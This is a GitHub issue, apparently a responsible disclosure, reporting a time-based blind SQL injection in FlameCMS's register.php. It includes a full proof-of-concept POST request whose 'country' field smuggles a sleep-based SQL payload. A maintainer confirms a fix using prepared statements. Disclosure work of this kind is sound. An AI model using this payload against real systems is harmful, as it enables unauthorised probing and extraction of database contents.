Skip to content
This repository has been archived by the owner on Feb 28, 2020. It is now read-only.

sql injection vulnerability (2) #26

Closed
blackjliuyun opened this issue Oct 17, 2019 · 2 comments
Closed

sql injection vulnerability (2) #26

blackjliuyun opened this issue Oct 17, 2019 · 2 comments

Comments

@blackjliuyun
Copy link

Hello
There is a Time-based blind injection vulnerability here too:
FlameCMS-master/account/register.php
image

image

poc :
POST /FlameCMS-master/account/register?XDEBUG_SESSION_START=16052 HTTP/1.1
Host: 127.0.0.1:8888
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:69.0) Gecko/20100101 Firefox/69.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 379
Connection: close
Referer: http://127.0.0.1:8888/FlameCMS-master/account/register?XDEBUG_SESSION_START=19560
Cookie: bdshare_firstime=1521359417238; _ga=GA1.1.1769867541.1569134195; mprtcl-v4_CCA8AE13={'gs':{'ie':1|'dt':'719f10ea1d9f664eab8238c61651c212'|'cgid':'319bce97-c8d8-46c5-8392-475ba6458c8a'|'das':'52a59f82-afe9-4f23-a231-edd8a11fc7d1'}|'l':0|'2092622027007090544':{'fst':1569134198283}|'cu':'2092622027007090544'}; PHPSESSID=dc9b176c866392458b9562d3ff8f6840; XDEBUG_SESSION=16052
Upgrade-Insecure-Requests: 1

csrftoken=6d42030c-2ad6-4fa2-b3be-0ba74e5aa7aa&country=CRItest',concat('test',(select sleep(if(length(user())>1,1,0)))),'333');#&ret=&sourceType=&dobMonth=1&dobDay=1&dobYear=2015&firstname=11111&lastname=11111&emailAddress=431%4011.com&emailAddressConfirmation=431%4011.com&password=11111&rePassword=11111&question1=19&answer1=bmw&agreedToChatPolicy=true&agreedToToU=true&submit

Time based injection and need to write the new emailAddress everytime to test
image

image

image

@tlcd96
Copy link
Contributor

tlcd96 commented Oct 17, 2019

got it

tlcd96 pushed a commit that referenced this issue Oct 17, 2019
solving issue #26
@tlcd96
Copy link
Contributor

tlcd96 commented Oct 17, 2019

solved sql injection with prepared statement

@tlcd96 tlcd96 closed this as completed Oct 17, 2019
Sign up for free to subscribe to this conversation on GitHub. Already have an account? Sign in.
Labels
None yet
Projects
None yet
Development

No branches or pull requests

2 participants